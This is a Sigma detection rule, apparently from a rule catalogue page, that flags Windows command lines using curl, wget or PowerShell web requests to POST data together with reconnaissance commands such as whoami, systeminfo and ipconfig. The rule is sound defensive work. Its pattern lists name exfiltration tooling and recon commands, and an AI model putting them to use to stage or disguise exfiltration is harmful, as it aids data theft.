Potential Data Exfiltration Activity Via CommandLine Tools

Detects the use of various CLI utilities exfiltrating data via web requests

Sigma rule (View on GitHub)

 1title: Potential Data Exfiltration Activity Via CommandLine Tools
 2id: 7d1aaf3d-4304-425c-b7c3-162055e0b3ab
 3status: test
 4description: Detects the use of various CLI utilities exfiltrating data via web requests
 5references:
 6    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
 7author: Nasreddine Bencherchali (Nextron Systems)
 8date: 2022-08-02
 9modified: 2025-07-18
10tags:
11    - attack.execution
12    - attack.t1059.001
13logsource:
14    category: process_creation
15    product: windows
16detection:
17    selection_iwr:
18        Image|endswith:
19            - '\powershell_ise.exe'
20            - '\powershell.exe'
21            - '\pwsh.exe'
22            - '\cmd.exe'
23        CommandLine|contains:
24            - 'curl '
25            - 'Invoke-RestMethod'
26            - 'Invoke-WebRequest'
27            - 'irm '
28            - 'iwr '
29            - 'wget '
30        CommandLine|contains|all:
31            - ' -ur' # Shortest possible version of the -uri flag
32            - ' -me' # Shortest possible version of the -method flag
33            - ' -b'
34            - ' POST '
35    selection_curl:
36        Image|endswith: '\curl.exe'
37        CommandLine|contains: '--ur' # Shortest possible version of the --uri flag
38    selection_curl_data:
39        CommandLine|contains:
40            - ' -d ' # Shortest possible version of the --data flag
41            - ' --data '
42    selection_wget:
43        Image|endswith: '\wget.exe'
44        CommandLine|contains:
45            - '--post-data'
46            - '--post-file'
47    payloads:
48        - CommandLine|contains:
49              - 'Get-Content'
50              - 'GetBytes'
51              - 'hostname'
52              - 'ifconfig'
53              - 'ipconfig'
54              - 'net view'
55              - 'netstat'
56              - 'nltest'
57              - 'qprocess'
58              - 'sc query'
59              - 'systeminfo'
60              - 'tasklist'
61              - 'ToBase64String'
62              - 'whoami'
63        - CommandLine|contains|all:
64              - 'type '
65              - ' > '
66              - ' C:\'
67    condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads
68falsepositives:
69    - Unlikely
70level: high

References

Related rules

to-top